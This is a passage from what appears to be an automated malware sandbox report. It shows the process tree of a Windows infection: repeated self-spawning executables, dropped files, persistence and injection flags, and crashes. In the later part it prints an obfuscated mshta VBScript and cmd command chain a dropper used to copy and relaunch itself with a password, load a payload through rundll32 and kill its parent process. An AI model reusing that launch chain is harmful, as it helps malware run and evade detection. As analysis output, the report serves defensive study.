C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8820
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4072
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6696
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4092
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3276
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10048
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4596
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10304
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11032
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4560
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10924
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6388
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8488
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5028
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:2868
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6212
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8396
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7804
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6876
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6584
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10464
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9132
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9504
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:824
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9300
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2924
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8284
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10340
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3964
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10504
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7880
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:2216
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7732
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10784
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9040
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7656
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9772 -s 284⤵
- Program crash
PID:9636
-
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:2204
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7456
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8412
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6112
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5304
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8920
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10192
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5652
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10552
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3324
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9016
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7636
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10696
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9764
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6996
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8240
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9468
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9028
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:2520
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7836
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11120
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7396
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6812
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9296
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9952
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9788
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:1164
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6836
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5264
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11284
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12708
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13260
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13036
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12888
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:2540
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6680
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5352
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10748
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5996
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5116
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4884
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10276
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13888
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14324
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13824
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8312
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14060
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13708
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13524
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4336
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12184
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4924
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14260
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13624
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11824
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12872
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10808
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12900
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11420
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12408
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:4644 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 284⤵
- Program crash
PID:14008
-
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:10776
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11724
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4340
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11696
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11992
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:12880
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7944
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8380
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13576
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14952
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14776
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14740
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14340
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:11476
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14972
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:15228
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13664
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:15592
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:16236
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:15772
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:15740
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:13792
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:14084
-
-
-
C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"2⤵
- Executes dropped EXE
PID:1108 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )3⤵PID:2956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe" ) do taskkill -F /Im "%~nXN"4⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG5⤵
- Executes dropped EXE
PID:3172 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )6⤵PID:4952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"7⤵PID:5228
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p6⤵PID:5580
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "K881cE9ZARVUqncSaZBmTZq6.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
-
-
-
C:\Users\Admin\Documents\fngXcmjsam0oJRnstReCykOV.exe"C:\Users\Admin\Documents\fngXcmjsam0oJRnstReCykOV.exe"2⤵
- Executes dropped EXE
PID:1000
-
-
C:\Users\Admin\Documents\O0GjO4BxRBaQwuHKn8sPaAFp.exe"C:\Users\Admin\Documents\O0GjO4BxRBaQwuHKn8sPaAFp.exe"2⤵
- Executes dropped EXE
PID:680
-
-
C:\Users\Admin\Documents\yHiCplLxrI4T5LLnVx6XVlNj.exe"C:\Users\Admin\Documents\yHiCplLxrI4T5LLnVx6XVlNj.exe"2⤵
- Executes dropped EXE
PID:468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 468 -s 2803⤵
- Program crash
PID:4980
-
-
-
C:\Users\Admin\Documents\fA8YUw_bCw4n8NoOFcuKKYLJ.exe"C:\Users\Admin\Documents\fA8YUw_bCw4n8NoOFcuKKYLJ.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Users\Admin\Documents\40Dbba5JzkHguF5BHFE7sdfW.exe"C:\Users\Admin\Documents\40Dbba5JzkHguF5BHFE7sdfW.exe"2⤵
- Executes dropped EXE
PID:3196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 2803⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
-
C:\Users\Admin\Documents\Qy6qE9ZI7Djrb_apEAlf61NL.exe"C:\Users\Admin\Documents\Qy6qE9ZI7Djrb_apEAlf61NL.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Users\Admin\AppData\Roaming\2938032.exe"C:\Users\Admin\AppData\Roaming\2938032.exe"3⤵PID:3540
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3540 -s 23124⤵
- Program crash
PID:8360
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3540 -s 23124⤵
- Program crash
PID:8712
-
-
-
C:\Users\Admin\AppData\Roaming\7012397.exe"C:\Users\Admin\AppData\Roaming\7012397.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4624 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5144
-
-
-
C:\Users\Admin\AppData\Roaming\5982993.exe"C:\Users\Admin\AppData\Roaming\5982993.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Users\Admin\AppData\Roaming\6209719.exe"C:\Users\Admin\AppData\Roaming\6209719.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Users\Admin\AppData\Roaming\6969144.exe"C:\Users\Admin\AppData\Roaming\6969144.exe"3⤵PID:5704
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe"C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1704 -
